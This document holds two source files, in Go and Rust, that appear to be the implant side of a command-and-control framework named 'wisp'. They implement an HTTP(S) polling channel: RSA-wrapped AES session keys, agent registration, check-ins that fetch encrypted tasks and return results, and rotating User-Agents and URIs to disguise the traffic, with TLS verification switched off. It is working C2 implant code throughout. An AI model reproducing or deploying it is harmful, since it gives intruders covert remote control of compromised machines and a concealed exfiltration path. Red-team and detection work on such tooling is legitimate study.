File: src/agent/transport/http.go
package transport

import (
	"bytes"
	"crypto/rand"
	"crypto/tls"
	"encoding/base64"
	"encoding/binary"
	"encoding/json"
	"fmt"
	"io"
	"net"
	"net/http"
	"time"

	"github.com/user/wisp/agent/config"
	"github.com/user/wisp/shared/protocol"
)

// HTTPTransport implements the polling-based HTTP(S) C2 channel.
// It mirrors the wire format of TCPTransport (RSA key exchange + AES session
// encryption) but frames the payloads in JSON over HTTP.
type HTTPTransport struct {
	Host      string
	Port      int
	UseTLS    bool
	AgentID   string
	Keys      *protocol.SessionKeys
	RSAPubPEM string

	// Fingerprint optionally pins the server TLS certificate (hex SHA-256).
	Fingerprint string

	// TrafficProfile drives per-request UA rotation / URI alternation
	// (Malleable-profile lite).
	TrafficProfile *config.TrafficProfile

	client *http.Client
	base   string

	seq uint64 // monotonic checkin counter (replay protection)
	ua  uint64 // UA rotation index
	uri uint64 // URI rotation index
}

// SetTrafficProfile configures UA rotation / URI alternation on the transport.
func (t *HTTPTransport) SetTrafficProfile(p *config.TrafficProfile) {
	t.TrafficProfile = p
}

// pickURI rotates across the profile's URIs. When none are set, falls back to
// the fixed path. `shift` advances the rotation so consecutive requests use
// different URIs when a profile lists several.
func (t *HTTPTransport) pickURI(fixed string, shift uint64) string {
	if t.TrafficProfile == nil {
		return t.base + fixed
	}
	// Pinned per-endpoint URI (from the listener's Malleable profile) wins.
	var pinned string
	switch {
	case fixed == "/api/v1/register":
		pinned = t.TrafficProfile.RegisterURI
	case fixed == "/api/v1/checkin":
		pinned = t.TrafficProfile.CheckinURI
	case fixed == "/api/v1/pubkey":
		pinned = t.TrafficProfile.PubKeyURI
	}
	if pinned != "" {
		return t.base + pinned
	}
	if len(t.TrafficProfile.URIs) == 0 {
		return t.base + fixed
	}
	idx := (t.uri + shift) % uint64(len(t.TrafficProfile.URIs))
	t.uri = (t.uri + 1) % uint64(len(t.TrafficProfile.URIs))
	return t.base + t.TrafficProfile.URIs[idx]
}

// applyProfile sets the rotating User-Agent header (if any) on a request.
func (t *HTTPTransport) applyProfile(req *http.Request) {
	if t.TrafficProfile != nil && len(t.TrafficProfile.UserAgents) > 0 {
		ua := t.TrafficProfile.UserAgents[t.ua%uint64(len(t.TrafficProfile.UserAgents))]
		t.ua++
		req.Header.Set("User-Agent", ua)
	}
}

// fetchServerKey retrieves the RSA public key from the server's /pubkey
// endpoint. Used when the binary has no compiled-in key (CLI/dev mode).
func (t *HTTPTransport) fetchServerKey() error {
	req, err := http.NewRequest(http.MethodGet, t.pickURI("/api/v1/pubkey", 0), nil)
	if err != nil {
		return err
	}
	t.applyProfile(req)
	resp, err := t.client.Do(req)
	if err != nil {
		return err
	}
	defer resp.Body.Close()
	if resp.StatusCode != http.StatusOK {
		return fmt.Errorf("pubkey endpoint returned %d", resp.StatusCode)
	}
	var out struct {
		PubKey string `json:"pubkey"`
	}
	if err := json.NewDecoder(resp.Body).Decode(&out); err != nil {
		return err
	}
	if out.PubKey == "" {
		return fmt.Errorf("server returned an empty public key")
	}
	t.RSAPubPEM = out.PubKey
	return nil
}

type httpRegisterRequest struct {
	Payload string `json:"payload"`
}

type httpRegisterResponse struct {
	Status string `json:"status"`
	Ack    string `json:"ack"`
}

type httpCheckinRequest struct {
	ID   string `json:"id"`
	Seq  uint64 `json:"seq"`
	Data string `json:"data"`
}

type httpCheckinResponse struct {
	Tasks string `json:"tasks"`
}

// NewHTTPTransport creates an HTTP transport from a base URL and public key.
func NewHTTPTransport(host string, port int, useTLS bool, agentID, rsaPubPEM, fingerprint string) *HTTPTransport {
	scheme := "http"
	if useTLS {
		scheme = "https"
	}
	tlsCfg := &tls.Config{InsecureSkipVerify: true}
	if fingerprint != "" {
		tlsCfg.VerifyPeerCertificate = fingerprintVerifier(fingerprint)
	}
	tr := &http.Transport{TLSClientConfig: tlsCfg}
	return &HTTPTransport{
		Host:        host,
		Port:        port,
		UseTLS:      useTLS,
		AgentID:     agentID,
		RSAPubPEM:   rsaPubPEM,
		Fingerprint: fingerprint,
		client: &http.Client{
			Transport: tr,
			Timeout:   30 * time.Second,
		},
		base: fmt.Sprintf("%s://%s", scheme, net.JoinHostPort(host, fmt.Sprintf("%d", port))),
	}
}

// Register performs the initial agent registration with the server.
func (t *HTTPTransport) Register(regData []byte) error {
	// Agents launched without a compiled-in key (CLI mode) fetch it first.
	if t.RSAPubPEM == "" {
		if err := t.fetchServerKey(); err != nil {
			return fmt.Errorf("fetch server key: %w", err)
		}
	}

	// Generate session keys
	aesKey := make([]byte, 32)
	hmacKey := make([]byte, 32)
	io.ReadFull(rand.Reader, aesKey)
	io.ReadFull(rand.Reader, hmacKey)
	t.Keys = &protocol.SessionKeys{AESKey: aesKey, HMACKey: hmacKey}

	// Hybrid encryption (same as TCP transport)
	keyMaterial := append(aesKey, hmacKey...)
	encryptedKeys, err := protocol.RSAEncrypt([]byte(t.RSAPubPEM), keyMaterial)
	if err != nil {
		return fmt.Errorf("RSA encrypt: %w", err)
	}

	encryptedReg, err := t.Keys.Encrypt(regData)
	if err != nil {
		return fmt.Errorf("encrypt reg data: %w", err)
	}

	// Build payload: [4 bytes key_len][encrypted_keys][encrypted_reg]
	keyLen := uint32(len(encryptedKeys))
	payload := make([]byte, 4+len(encryptedKeys)+len(encryptedReg))
	binary.LittleEndian.PutUint32(payload[0:4], keyLen)
	copy(payload[4:4+keyLen], encryptedKeys)
	copy(payload[4+keyLen:], encryptedReg)

	req := httpRegisterRequest{Payload: base64.StdEncoding.EncodeToString(payload)}
	body, err := json.Marshal(req)
	if err != nil {
		return err
	}

	httpreq, err := http.NewRequest(http.MethodPost, t.pickURI("/api/v1/register", 0), bytes.NewReader(body))
	if err != nil {
		return err
	}
	httpreq.Header.Set("Content-Type", "application/json")
	t.applyProfile(httpreq)
	resp, err := t.client.Do(httpreq)
	if err != nil {
		return fmt.Errorf("register request: %w", err)
	}
	defer resp.Body.Close()

	if resp.StatusCode != http.StatusOK {
		return fmt.Errorf("register returned status %d", resp.StatusCode)
	}

	var res httpRegisterResponse
	if err := json.NewDecoder(resp.Body).Decode(&res); err != nil {
		return fmt.Errorf("decode register response: %w", err)
	}
	if res.Status != "ok" {
		return fmt.Errorf("registration rejected")
	}

	// Verify ACK decrypts (proves the server holds the session keys)
	ackData, err := base64.StdEncoding.DecodeString(res.Ack)
	if err != nil {
		return fmt.Errorf("decode ack: %w", err)
	}
	if _, err := t.Keys.Decrypt(ackData); err != nil {
		return fmt.Errorf("decrypt ack: %w", err)
	}

	return nil
}

// Checkin polls the server for tasks, optionally delivering results.
func (t *HTTPTransport) Checkin(results []byte) ([]byte, error) {
	t.seq++
	req := httpCheckinRequest{ID: t.AgentID, Seq: t.seq}
	if len(results) > 0 {
		encrypted, err := t.Keys.Encrypt(results)
		if err != nil {
			return nil, fmt.Errorf("encrypt results: %w", err)
		}
		req.Data = base64.StdEncoding.EncodeToString(encrypted)
	}

	body, err := json.Marshal(req)
	if err != nil {
		return nil, err
	}

	httpreq, err := http.NewRequest(http.MethodPost, t.pickURI("/api/v1/checkin", t.seq), bytes.NewReader(body))
	if err != nil {
		return nil, err
	}
	httpreq.Header.Set("Content-Type", "application/json")
	t.applyProfile(httpreq)
	resp, err := t.client.Do(httpreq)
	if err != nil {
		return nil, fmt.Errorf("checkin request: %w", err)
	}
	defer resp.Body.Close()

	if resp.StatusCode == http.StatusUnauthorized {
		// Session unknown (e.g. after a server restart) → re-register
		return nil, ErrReauth
	}
	if resp.StatusCode != http.StatusOK {
		return nil, fmt.Errorf("checkin returned status %d", resp.StatusCode)
	}

	var res httpCheckinResponse
	if err := json.NewDecoder(resp.Body).Decode(&res); err != nil {
		return nil, fmt.Errorf("decode checkin response: %w", err)
	}

	tasksData, err := base64.StdEncoding.DecodeString(res.Tasks)
	if err != nil {
		return nil, fmt.Errorf("decode tasks: %w", err)
	}
	return t.Keys.Decrypt(tasksData)
}

File: src/agent-rust/src/transport/http.rs
// HTTP polling transport — MUST match Go agent/transport/http.go wire format.
//
// Register: POST /api/v1/register { "payload": b64([4B key_len][RSA keys][AES reg]) }
//   → { "status":"ok", "ack": b64(AES-encrypted ack) }
// Checkin: POST /api/v1/checkin { "id","seq","data": b64(AES-encrypted results) }
//   → { "tasks": b64(AES-encrypted task JSON) }
// Pubkey:  GET /api/v1/pubkey → { "pubkey": PEM }
//   (only used when no compiled-in key; M0 config always carries the key)
//
// The payload transform is delegated to a `Codec` trait object so a future
// Malleable-profile / script-defined codec can be swapped in without changing
// the HTTP framing (see protocol/codec.rs).

use crate::protocol::codec::{Codec, DefaultCodec};
use crate::protocol::crypto::SessionKeys;
use base64::engine::general_purpose::STANDARD as B64;
use base64::Engine;
use serde_json::json;

use super::TransportError;

pub struct HttpTransport {
    pub base: String,
    pub agent_id: String,
    pub codec: Box<dyn Codec>,
    pub rsa_pub_pem: String,
    pub seq: u64,
    /// Malleable traffic profile (custom URIs / UA rotation).
    pub profile: Option<crate::agent::TrafficProfile>,
    pub session_keys: Option<SessionKeys>,
    agent: ureq::Agent,
    uri_rot: usize,
    ua_rot: usize,
}

impl HttpTransport {
    pub fn new(host: &str, port: u16, agent_id: &str, rsa_pub_pem: &str) -> Self {
        let scheme = std::env::var("WISP_SCHEME")
            .ok()
            .filter(|v| !v.is_empty())
            .unwrap_or_else(|| "http".to_string());
        let base = format!("{scheme}://{host}:{port}");
        let agent = if scheme == "https" {
            super::tls::insecure_agent()
        } else {
            ureq::AgentBuilder::new().build()
        };
        HttpTransport {
            base,
            agent_id: agent_id.to_string(),
            codec: Box::new(DefaultCodec::new([0u8; 32], [0u8; 32])),
            rsa_pub_pem: rsa_pub_pem.to_string(),
            seq: 0,
            profile: None,
            session_keys: None,
            agent,
            uri_rot: 0,
            ua_rot: 0,
        }
    }

    /// Install a Malleable traffic profile (URI/UA rotation).
    pub fn set_profile(&mut self, p: Option<crate::agent::TrafficProfile>) {
        self.profile = p;
    }

    fn resolve_uri(&mut self, fixed: &str) -> String {
        match &self.profile {
            Some(p) => p.resolve_uri(&self.base, fixed, &mut self.uri_rot),
            None => format!("{}{}", self.base, fixed),
        }
    }

    fn apply_ua(&mut self, req: ureq::Request) -> ureq::Request {
        if let Some(ua) = self.profile.as_ref().and_then(|p| p.user_agent(&mut self.ua_rot)) {
            req.set("User-Agent", &ua)
        } else {
            req
        }
    }

    /// Install a custom codec (Malleable/script transform). Default is the
    /// Go-compatible AES+HMAC codec; only replaced when building a profile.
    /// Reset the checkin sequence counter (after re-registration).
    pub fn reset_seq(&mut self) {
        self.seq = 0;
    }

    pub fn set_codec(&mut self, c: Box<dyn Codec>) {
        self.codec = c;
    }

    /// Perform registration. `reg_json` is the marshalled RegisterData.
    pub fn register(&mut self, reg_json: &[u8]) -> Result<(), TransportError> {
        // Generate session keys (32+32 bytes, RSA-encrypted together)
        let keys = SessionKeys::generate();
        let mut key_material = Vec::with_capacity(64);
        key_material.extend_from_slice(&keys.aes_key);
        key_material.extend_from_slice(&keys.hmac_key);

        let encrypted_keys =
            crate::protocol::crypto::rsa_encrypt_oaep(&self.rsa_pub_pem, &key_material)
                .map_err(|e| TransportError::Other(e))?;
        let encrypted_reg = keys.encrypt(reg_json);

        // [4B key_len][encrypted_keys][encrypted_reg]
        let mut payload = Vec::with_capacity(4 + encrypted_keys.len() + encrypted_reg.len());
        payload.extend_from_slice(&(encrypted_keys.len() as u32).to_le_bytes());
        payload.extend_from_slice(&encrypted_keys);
        payload.extend_from_slice(&encrypted_reg);

        let body = json!({ "payload": B64.encode(&payload) }).to_string();

        let url = self.resolve_uri("/api/v1/register");
        let req = self.agent.post(&url).set("Content-Type", "application/json");
        let req = self.apply_ua(req);
        let resp = req
            .send_string(&body)
            .map_err(|e| TransportError::Other(format!("register request: {e}")))?;

        if resp.status() != 200 {
            return Err(TransportError::Status(resp.status(), "register".into()));
        }

        let res: serde_json::Value = resp
            .into_json()
            .map_err(|e| TransportError::Other(format!("decode register response: {e}")))?;

        if res["status"] != "ok" {
            return Err(TransportError::Other("registration rejected".into()));
        }

        // Verify ACK decrypts (proves the server holds the session keys)
        let ack_b64 = res["ack"]
            .as_str()
            .ok_or_else(|| TransportError::Other("missing ack".into()))?;
        let ack_data = B64
            .decode(ack_b64)
            .map_err(|e| TransportError::Other(format!("decode ack: {e}")))?;
        keys.decrypt(&ack_data).map_err(|e| TransportError::Other(e))?;

        // Install the session codec keyed with the negotiated session keys.
        self.codec = Box::new(DefaultCodec::new(keys.aes_key, keys.hmac_key));
        self.session_keys = Some(keys.clone());
        Ok(())
    }

    /// Poll for tasks, optionally delivering encrypted results.
    /// Returns the decrypted task JSON bytes.
    pub fn checkin(&mut self, results: Option<&[u8]>) -> Result<Vec<u8>, TransportError> {
        self.seq += 1;

        let data_field = match results {
            Some(r) if !r.is_empty() => B64.encode(&self.codec.encode(r)),
            _ => String::new(),
        };

        let body = json!({
            "id": self.agent_id,
            "seq": self.seq,
            "data": data_field,
        })
        .to_string();

        let url = self.resolve_uri("/api/v1/checkin");
        let req = self.agent.post(&url).set("Content-Type", "application/json");
        let req = self.apply_ua(req);
        let resp = req
            .send_string(&body)
            .map_err(|e| TransportError::Other(format!("checkin request: {e}")))?;

        if resp.status() == 401 {
            return Err(TransportError::Other("reauth required".into()));
        }
        if resp.status() != 200 {
            return Err(TransportError::Status(resp.status(), "checkin".into()));
        }

        let res: serde_json::Value = resp
            .into_json()
            .map_err(|e| TransportError::Other(format!("decode checkin response: {e}")))?;

        let tasks_b64 = res["tasks"]
            .as_str()
            .ok_or_else(|| TransportError::Other("missing tasks".into()))?;
        let tasks_enc = B64
            .decode(tasks_b64)
            .map_err(|e| TransportError::Other(format!("decode tasks: {e}")))?;

        self.codec.decode(&tasks_enc).map_err(|e| TransportError::Other(e))
    }
}
